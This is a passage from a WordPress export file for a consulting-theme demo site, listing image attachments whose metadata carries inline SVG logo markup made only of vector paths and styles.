		<path class="st0" d="M65,22.5v-9.3h4.8c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.7,0.4,1,0.6c0.3,0.3,0.5,0.6,0.7,0.9    c0.2,0.4,0.2,0.8,0.2,1.2c0,0.6-0.2,1.1-0.5,1.6c-0.3,0.5-0.7,0.8-1.3,1.1l2,3.7h-2.6L69,19.1h-1.7v3.4H65z M69.6,15.1h-2.3v2.1    h2.3c0.4,0,0.6-0.1,0.9-0.3c0.2-0.2,0.3-0.4,0.3-0.8c0-0.3-0.1-0.6-0.3-0.8C70.2,15.2,69.9,15.1,69.6,15.1z"></path>
		<path class="st0" d="M74.2,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H74.2z"></path>
		<path class="st0" d="M83,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H83z"></path>
		<path class="st0" d="M91.7,13.2h2.2l4.2,5.4v-5.4h2.2v9.3h-2l-4.4-5.6v5.6h-2.2V13.2z"></path>
		<path class="st0" d="M104.4,22.5v-9.3h2.3v3.6h3.8v-3.6h2.3v9.3h-2.3v-3.6h-3.8v3.6H104.4z"></path>
		<path class="st0" d="M123.9,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.3,0.6-0.6,1.1-1.1,1.5c-0.4,0.4-1,0.8-1.6,1c-0.6,0.2-1.3,0.4-2,0.4    c-0.7,0-1.3-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,2-0.4c0.7,0,1.3,0.1,2,0.4c0.6,0.2,1.1,0.6,1.6,1    c0.4,0.4,0.8,0.9,1.1,1.5C123.8,16.5,123.9,17.2,123.9,17.8z M121.6,17.8c0-0.4-0.1-0.7-0.2-1.1c-0.1-0.3-0.3-0.6-0.6-0.9    s-0.5-0.4-0.8-0.6c-0.3-0.1-0.7-0.2-1-0.2c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6c-0.2,0.2-0.4,0.5-0.6,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.7,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9c0.2,0.2,0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1,0.2    c0.4,0,0.7-0.1,1-0.2c0.3-0.1,0.6-0.3,0.8-0.6c0.2-0.2,0.4-0.5,0.6-0.9C121.5,18.6,121.6,18.2,121.6,17.8z"></path>
		<path class="st0" d="M124.4,21.1l1.3-1.7c0.6,0.5,1.1,0.8,1.6,1c0.5,0.2,1,0.3,1.5,0.3c0.5,0,0.9-0.1,1.2-0.2    c0.3-0.2,0.4-0.4,0.4-0.7c0-0.3-0.1-0.5-0.3-0.6c-0.2-0.1-0.5-0.3-1-0.3l-2-0.4c-0.8-0.1-1.3-0.4-1.7-0.9c-0.4-0.4-0.6-1-0.6-1.7    c0-0.9,0.3-1.6,1-2.1c0.7-0.5,1.6-0.8,2.8-0.8c0.7,0,1.4,0.1,2.1,0.4c0.7,0.2,1.3,0.6,1.8,1l-1.2,1.7c-0.5-0.4-1-0.7-1.4-0.8    c-0.5-0.2-0.9-0.3-1.4-0.3c-0.5,0-0.8,0.1-1.1,0.2c-0.3,0.1-0.4,0.3-0.4,0.6c0,0.2,0.1,0.4,0.3,0.5c0.2,0.1,0.5,0.2,0.8,0.3    l1.9,0.3c0.9,0.1,1.6,0.4,2,0.9c0.5,0.5,0.7,1,0.7,1.8c0,0.9-0.4,1.7-1.1,2.2c-0.7,0.5-1.7,0.8-3,0.8c-0.7,0-1.5-0.1-2.2-0.4    C125.6,21.9,125,21.6,124.4,21.1z"></path>
		<path class="st0" d="M132.9,15.2v-2h8.4v2h-3v7.3H136v-7.3H132.9z"></path>
	</g>
	<path class="st0" d="M25.3,19.9c2.1,0,3.9-1.7,3.9-3.9s-1.7-3.9-3.9-3.9s-3.9,1.7-3.9,3.9S23.2,19.9,25.3,19.9z M13.9,23.1   c-1.4,0-2.5,1.1-2.5,2.5c0,1.4,1.1,2.5,2.5,2.5c1.4,0,2.5-1.1,2.5-2.5C16.5,24.2,15.3,23.1,13.9,23.1z M33.5,25.3   c-1,0-1.8,0.8-1.8,1.8s0.8,1.8,1.8,1.8c1,0,1.8-0.8,1.8-1.8S34.5,25.3,33.5,25.3z M43.8,16.3c-0.2-2.9-2.6-5.3-5.5-5.5   c-2.7-0.2-5,1.4-6,3.6l0,0c0,0,0,0,0,0l-1.7,4.1c-0.8,2-2.5,3.5-4.5,4.2h0c-1.4,0.5-3,0.1-4.1-0.9c-0.4-0.4-0.8-0.8-0.8-0.8   c-0.9-0.8-1.5-1.9-1.7-3.1c-0.1-0.4-0.1-0.8-0.1-1.2l0.2-4.5l0.1-2.1l0,0c0-0.1,0-0.1,0-0.2c0-5.7-4.8-10.2-10.5-9.8   C4.3,0.4,0.4,4.3,0,9.1C0,10,0,10.8,0.2,11.6c0.8,4.6,4.8,8,9.7,8c0.2,0,4.3,0.3,5.9,1.2l1.1,0.6c1.1,0.6,1.9,1.6,2.4,2.7l1.4,3.4   l0,0c0.4,1.4,1.6,2.5,3.2,2.5c1,0,2-0.5,2.6-1.2c0.5-0.6,4.1-4.2,4.1-4.2c0.8-0.9,2-1.4,3.2-1.5l4.8-0.3c2.5-0.2,4.5-1.9,5.3-4.2   c0.2-0.6,0.3-1.2,0.3-1.8C43.8,16.6,43.8,16.4,43.8,16.3z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/attachment/04/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>513</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/04.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 88.4 30.4" style="enable-background:new 0 0 88.4 30.4;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x34_">
	<path class="st0" d="M21.9,6c1.2,1,2.8,1.5,4.6,1.4c0.6,0,1.2-0.1,1.9-0.2c-1.2-1.9-2.8-3.6-4.8-4.9c-1.9-1.2-3.9-1.9-5.9-2.2   l1.8,2.8C20.1,4,20.9,5.2,21.9,6z M5.5,18.4C6.2,17.2,6.9,16,7,14.7c0.1-1-0.3-2.1-0.7-3.2L6,10.4C5.4,8.9,4.7,7.4,4.1,6   C4,5.8,3.9,5.7,3.9,5.6c0-0.1-0.1-0.1-0.1-0.2c0-0.1-0.1-0.2-0.1-0.2C3.2,5.7,2.8,6.2,2.4,6.8c-3.7,5.8-3,13,1.1,18   c-0.1-1.3,0.1-2.6,0.6-3.8C4.5,20.1,5,19.3,5.5,18.4z M30.1,18.9c0,0-0.1,0-0.1,0c-0.2,0-0.4,0-0.6,0c-0.1,0-0.2,0-0.2,0   c-1.4,0.2-2.6,0.5-3.7,1.1c-1.4,0.9-2.2,2.5-2.1,4.1c0,0.5,0.1,0.9,0.2,1.4c0.1,0.7,0.3,1.4,0.3,2.1c1.7-1.1,3.1-2.6,4.3-4.4   C29,21.9,29.7,20.4,30.1,18.9z M29.3,16.6c0.4-0.1,0.8-0.2,1.2-0.2c0.1-1.5,0-3-0.3-4.5c-0.2,0-0.4,0.1-0.5,0.1   c-0.9,0.2-1.8,0.5-2.7,0.9c-0.5,0.2-1,0.4-1.4,0.5c-1.3,0.4-3.2,0.9-5.1,0.5c-0.7-0.2-1.3-0.4-1.9-0.8c-1.1-0.7-2-1.8-2.5-3   c-0.4-1.1-0.5-2.2-0.6-3.3c0-0.6-0.1-1.1-0.2-1.6c-0.1-0.9-0.4-1.8-0.9-2.7c-0.5-1-1-1.7-1.5-2.3C10.9,0.3,9,1,7.3,2   C7.2,2.4,7,2.7,7,3C6.7,4.8,8,6.6,9,7.8C9.1,8,9.2,8.2,9.4,8.3c1.3,1.5,2.7,3.3,3,5.5c0.3,2.3-0.6,4.3-1.4,6.2   c-0.7,1.5-1.3,2.9-1.3,4.4c0,1.7,0.9,3.5,2.5,5c0.3,0.3,0.7,0.6,1.1,0.9c0.9,0.1,1.8,0.2,2.7,0.1c0.4-0.3,0.8-0.5,1.1-0.9   c0.8-1,1-2.4,1.1-3.8c0-0.2,0-0.4,0-0.6c0.1-1.5,0.1-3,0.8-4.5c0.8-1.7,2.3-3.1,4-3.6c1.3-0.4,2.7-0.4,4.1-0.4l0.1,0   c0.7,0,1.4,0.1,2,0C29.2,16.6,29.3,16.6,29.3,16.6z"></path>
	<g>
		<path class="st0" d="M48.2,15.5v4.9h-2.4v-4.9l-3.8-7.8h2.5l2.4,5.5l2.4-5.5H52L48.2,15.5z"></path>
		<path class="st0" d="M53.5,20.1c-0.6-0.3-1-0.8-1.3-1.4c-0.3-0.6-0.5-1.3-0.5-2.1v-1.5c0-0.8,0.2-1.5,0.5-2.1    c0.3-0.6,0.8-1,1.3-1.3c0.6-0.3,1.3-0.5,2.1-0.5s1.5,0.2,2.1,0.5c0.6,0.3,1,0.8,1.3,1.3c0.3,0.6,0.5,1.3,0.5,2.1v1.5    c0,0.8-0.2,1.5-0.5,2.1c-0.3,0.6-0.8,1-1.3,1.3c-0.6,0.3-1.3,0.5-2.1,0.5S54.1,20.4,53.5,20.1z M56.8,17.8    c0.3-0.3,0.4-0.7,0.4-1.2v-1.5c0-0.5-0.1-0.9-0.4-1.2s-0.6-0.4-1.1-0.4c-0.5,0-0.9,0.1-1.1,0.4c-0.3,0.3-0.4,0.7-0.4,1.2v1.5    c0,0.5,0.1,0.9,0.4,1.2c0.3,0.3,0.6,0.4,1.1,0.4S56.5,18.1,56.8,17.8z"></path>
		<path class="st0" d="M63,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C64,20.6,63.4,20.4,63,20.1z M66.7,7.7h2.4v12.8h-2.4V7.7z"></path>
		<path class="st0" d="M72.7,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C73.7,20.6,73.1,20.4,72.7,20.1z M73.7,24.2c0,0-0.3-0.1-0.9-0.4c-0.6-0.3-1-0.6-1.3-1.1l1.6-1.5c0.2,0.2,0.5,0.4,0.7,0.5    c0.3,0.1,0.6,0.2,0.9,0.2c0.5,0,0.9-0.1,1.2-0.4c0.3-0.3,0.5-0.7,0.5-1.1v-9h2.4v8.9c0,0.8-0.2,1.6-0.5,2.2    c-0.3,0.6-0.8,1.1-1.4,1.4s-1.4,0.5-2.2,0.5C74,24.2,73.7,24.2,73.7,24.2z"></path>
		<path class="st0" d="M80,11.3h2.3l3.1,7.9l-1.5,1.9L80,11.3z M88.4,11.3l-4.1,11.3c-0.2,0.4-0.3,0.7-0.6,1    c-0.2,0.2-0.5,0.4-0.8,0.5c-0.3,0.1-0.7,0.2-1.2,0.2h-0.5v-2.3h0.5c0.3,0,0.5-0.1,0.6-0.2c0.2-0.1,0.3-0.3,0.4-0.6l3.4-9.9H88.4z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/attachment/05/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>514</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/05.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 143.2 31.3" style="enable-background:new 0 0 143.2 31.3;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x35_">
	<g>
		<path class="st0" d="M57.2,20.5h-3.1l-0.9-2.8h-4.5l-0.9,2.8h-3.1l4.6-12.6h3.4L57.2,20.5z M52.6,15.6l-1.4-4.2    C51.1,11,51,10.6,51,10.2h-0.1c0,0.4-0.1,0.7-0.2,1.1l-1.4,4.3H52.6z"></path>
		<path class="st0" d="M63.9,20.4c-0.4,0.2-1,0.3-1.9,0.3c-2,0-2.9-1-2.9-3v-4.1h-1.5v-2h1.5V9.6l2.8-0.8v2.7h2v2h-2v3.6    c0,0.9,0.4,1.4,1.1,1.4c0.3,0,0.6-0.1,0.9-0.3V20.4z"></path>
		<path class="st0" d="M69.8,20.8c-1.5,0-2.7-0.4-3.5-1.3s-1.3-2-1.3-3.4c0-1.5,0.4-2.7,1.3-3.5c0.9-0.8,2.1-1.3,3.6-1.3    c1.5,0,2.7,0.4,3.5,1.3c0.8,0.8,1.3,2,1.3,3.3c0,1.5-0.4,2.7-1.3,3.5S71.3,20.8,69.8,20.8z M69.9,13.5c-0.7,0-1.2,0.2-1.5,0.7    s-0.5,1.1-0.5,1.9c0,1.7,0.7,2.6,2.1,2.6c1.3,0,2-0.9,2-2.7C71.9,14.3,71.2,13.5,69.9,13.5z"></path>
		<path class="st0" d="M90.8,20.5H88v-5.1c0-1.3-0.5-2-1.4-2c-0.5,0-0.8,0.2-1.1,0.6S85,14.9,85,15.5v5h-2.8v-5.2    c0-1.3-0.5-1.9-1.4-1.9c-0.5,0-0.9,0.2-1.1,0.6c-0.3,0.4-0.4,0.9-0.4,1.5v5h-2.8v-9h2.8V13h0c0.3-0.5,0.7-0.9,1.2-1.2    c0.5-0.3,1.1-0.5,1.7-0.5c1.3,0,2.1,0.6,2.6,1.7c0.7-1.1,1.7-1.7,3-1.7c2,0,2.9,1.2,2.9,3.6V20.5z"></path>
		<path class="st0" d="M94.4,10.1c-0.5,0-0.9-0.1-1.2-0.4c-0.3-0.3-0.4-0.6-0.4-1c0-0.4,0.1-0.8,0.4-1s0.7-0.4,1.2-0.4    c0.5,0,0.9,0.1,1.2,0.4s0.4,0.6,0.4,1c0,0.4-0.1,0.8-0.4,1S94.9,10.1,94.4,10.1z M95.8,20.5H93v-9h2.8V20.5z"></path>
		<path class="st0" d="M104.9,20.2c-0.6,0.4-1.5,0.5-2.7,0.5c-1.4,0-2.5-0.4-3.4-1.3s-1.3-1.9-1.3-3.2c0-1.5,0.5-2.7,1.4-3.6    s2.1-1.3,3.7-1.3c1.1,0,1.8,0.1,2.3,0.4v2.4c-0.6-0.4-1.2-0.7-1.9-0.7c-0.8,0-1.4,0.2-1.9,0.7c-0.5,0.5-0.7,1.1-0.7,1.9    c0,0.8,0.2,1.4,0.7,1.9s1.1,0.7,1.8,0.7c0.7,0,1.4-0.2,2-0.7V20.2z"></path>
		<path class="st0" d="M111.4,20.1v-2.8c0.5,0.4,1.1,0.7,1.7,1c0.6,0.2,1.2,0.3,1.8,0.3c0.4,0,0.7,0,0.9-0.1    c0.3-0.1,0.5-0.2,0.7-0.3c0.2-0.1,0.3-0.2,0.4-0.4s0.1-0.3,0.1-0.5c0-0.2-0.1-0.5-0.2-0.7s-0.3-0.4-0.6-0.5s-0.5-0.3-0.9-0.5    s-0.7-0.3-1.1-0.5c-1-0.4-1.7-0.9-2.2-1.5c-0.5-0.6-0.7-1.3-0.7-2.1c0-0.7,0.1-1.2,0.4-1.7s0.6-0.9,1.1-1.2c0.5-0.3,1-0.5,1.6-0.7    c0.6-0.1,1.2-0.2,1.9-0.2c0.7,0,1.2,0,1.7,0.1c0.5,0.1,1,0.2,1.4,0.4v2.6c-0.2-0.1-0.4-0.3-0.7-0.4s-0.5-0.2-0.8-0.3    c-0.3-0.1-0.5-0.1-0.8-0.2c-0.3,0-0.5-0.1-0.7-0.1c-0.3,0-0.6,0-0.9,0.1c-0.3,0.1-0.5,0.1-0.7,0.3s-0.3,0.2-0.4,0.4    s-0.1,0.3-0.1,0.5c0,0.2,0.1,0.4,0.2,0.6c0.1,0.2,0.3,0.3,0.5,0.5c0.2,0.1,0.5,0.3,0.7,0.4s0.6,0.3,1,0.4c0.5,0.2,1,0.4,1.4,0.7    c0.4,0.2,0.7,0.5,1,0.8s0.5,0.6,0.7,1c0.2,0.4,0.2,0.8,0.2,1.3c0,0.7-0.1,1.3-0.4,1.8c-0.3,0.5-0.6,0.9-1.1,1.2    c-0.5,0.3-1,0.5-1.6,0.6c-0.6,0.1-1.2,0.2-1.9,0.2c-0.7,0-1.3-0.1-2-0.2C112.4,20.5,111.9,20.3,111.4,20.1z"></path>
		<path class="st0" d="M129.6,20.5h-7.6V7.9h7.3v2.3h-4.4v2.8h4.1v2.3h-4.1v2.9h4.7V20.5z"></path>
		<path class="st0" d="M137,20.8c-1.8,0-3.3-0.6-4.4-1.8c-1.1-1.2-1.7-2.7-1.7-4.6c0-2,0.6-3.6,1.7-4.8s2.7-1.8,4.6-1.8    c1.8,0,3.3,0.6,4.4,1.8c1.1,1.2,1.7,2.7,1.7,4.7c0,2-0.6,3.6-1.7,4.8C140.3,20.2,138.8,20.8,137,20.8z M137.1,10.2    c-1,0-1.8,0.4-2.4,1.1c-0.6,0.7-0.9,1.7-0.9,3c0,1.2,0.3,2.2,0.9,3s1.4,1.1,2.3,1.1c1,0,1.8-0.4,2.3-1.1s0.9-1.7,0.9-2.9    c0-1.3-0.3-2.3-0.8-3S138.1,10.2,137.1,10.2z"></path>
	</g>
	<path class="st0" d="M30.3,16.2c-1.3,0-2.4,1.1-2.4,2.4c0,0.3,0.1,0.7,0.2,1l-5.4,5.4c-0.2-0.1-0.4-0.3-0.6-0.4V9.8   c2.6-0.1,4.6-2.3,4.6-4.9c0-2.7-2.2-4.9-4.9-4.9s-4.9,2.2-4.9,4.9c0,0.7,0.1,1.3,0.4,1.9l-6.8,5.3c-1.1-1.1-2.6-1.7-4.3-1.7   c-3.4,0-6.2,2.8-6.2,6.2c0,3.4,2.8,6.2,6.2,6.2c3.4,0,6.2-2.8,6.2-6.2c0-1.1-0.3-2.1-0.8-3l6.7-5.2c0.5,0.6,1.2,1,2,1.2v14.7   c-1.9,0.1-3.3,1.7-3.3,3.5c0,2,1.6,3.6,3.6,3.6c2,0,3.6-1.6,3.6-3.6c0-0.5-0.1-0.9-0.3-1.3l5.6-5.6c0.3,0.1,0.6,0.2,1,0.2   c1.3,0,2.4-1.1,2.4-2.4C32.7,17.2,31.6,16.2,30.3,16.2z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>06</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/attachment/06/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/06.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>515</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[06]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/06.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/06.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 128 29.8" style="enable-background:new 0 0 128 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x36_">
	<path class="st0" d="M12.4,9.9C10.7,8,8.2,7.2,5.8,7.5C5.6,7.9,5.4,8.3,5.2,8.7c1.3,0.3,2.6,0.9,3.6,2c2.5,2.7,2.3,6.9-0.4,9.4   c-0.9,0.9-2.1,1.4-3.2,1.6c0.1,0.2,0.2,0.4,0.3,0.5c2.3,0.5,4.7-0.1,6.5-1.8C15,17.6,15.2,12.9,12.4,9.9z M7.6,17.8   c1.4-1.9,1-4.7-1-6.1c-1.9-1.4-4.7-1-6.1,1C0.3,13,0.1,13.3,0,13.7c0.8-0.8,2-0.9,2.9-0.2c1,0.7,1.2,2.2,0.5,3.2   c-0.7,1-2.2,1.2-3.2,0.5c0,0-0.1,0-0.1-0.1c0.3,0.6,0.8,1.2,1.4,1.6C3.5,20.2,6.2,19.7,7.6,17.8z M20.7,7c-3.1-3.4-7.8-4.5-12-3.3   C8.6,3.8,8.6,3.9,8.5,3.9C7.9,4.5,7.3,5.1,6.9,5.7c2.7-0.2,5.5,0.7,7.5,2.9c3.4,3.7,3.1,9.4-0.6,12.8c-2,1.9-4.7,2.6-7.2,2.3   c0.3,0.4,0.6,0.8,1,1.2c0.3,0.4,0.7,0.7,1,1c3.8,1.2,8.2,0.4,11.4-2.5C24.7,19.1,25.1,11.8,20.7,7z M11.6,1.7   c4.1-0.5,8.5,0.9,11.5,4.2c5,5.4,4.6,13.8-0.8,18.8c-3,2.7-6.8,3.8-10.6,3.4c5.4,2.8,12.2,2.1,16.9-2.2c6.1-5.6,6.5-15,0.9-21.1   C24.9-0.3,17.5-1.4,11.6,1.7z"></path>
	<g>
		<path class="st0" d="M46.9,7.2h5.6c1.2,0,2.1,0.3,2.9,0.9c0.7,0.6,1.1,1.4,1.1,2.4c0,0.6-0.2,1.2-0.5,1.7    c-0.4,0.5-0.9,0.9-1.5,1.1c0.7,0.2,1.3,0.6,1.8,1.1c0.4,0.5,0.7,1.1,0.7,1.9c0,1-0.4,1.9-1.2,2.5c-0.8,0.6-1.8,1-3,1h-5.9V7.2z     M52.3,9h-3.2v3.5h3.2c0.6,0,1.1-0.2,1.5-0.5c0.4-0.3,0.6-0.7,0.6-1.3s-0.2-1-0.6-1.3C53.4,9.1,52.9,9,52.3,9z M52.5,18    c0.7,0,1.2-0.2,1.6-0.5c0.4-0.4,0.6-0.8,0.6-1.4s-0.2-1.1-0.6-1.4c-0.4-0.3-0.9-0.5-1.6-0.5h-3.4V18H52.5z"></path>
		<path class="st0" d="M58.8,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1C64.6,19.9,64,20,63.3,20s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C58.9,16.6,58.8,16,58.8,15.3z M63.3,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C62,18,62.6,18.2,63.3,18.2z"></path>
		<path class="st0" d="M69.6,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C69.7,16.6,69.6,16,69.6,15.3z M74.2,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C72.8,18,73.4,18.2,74.2,18.2z"></path>
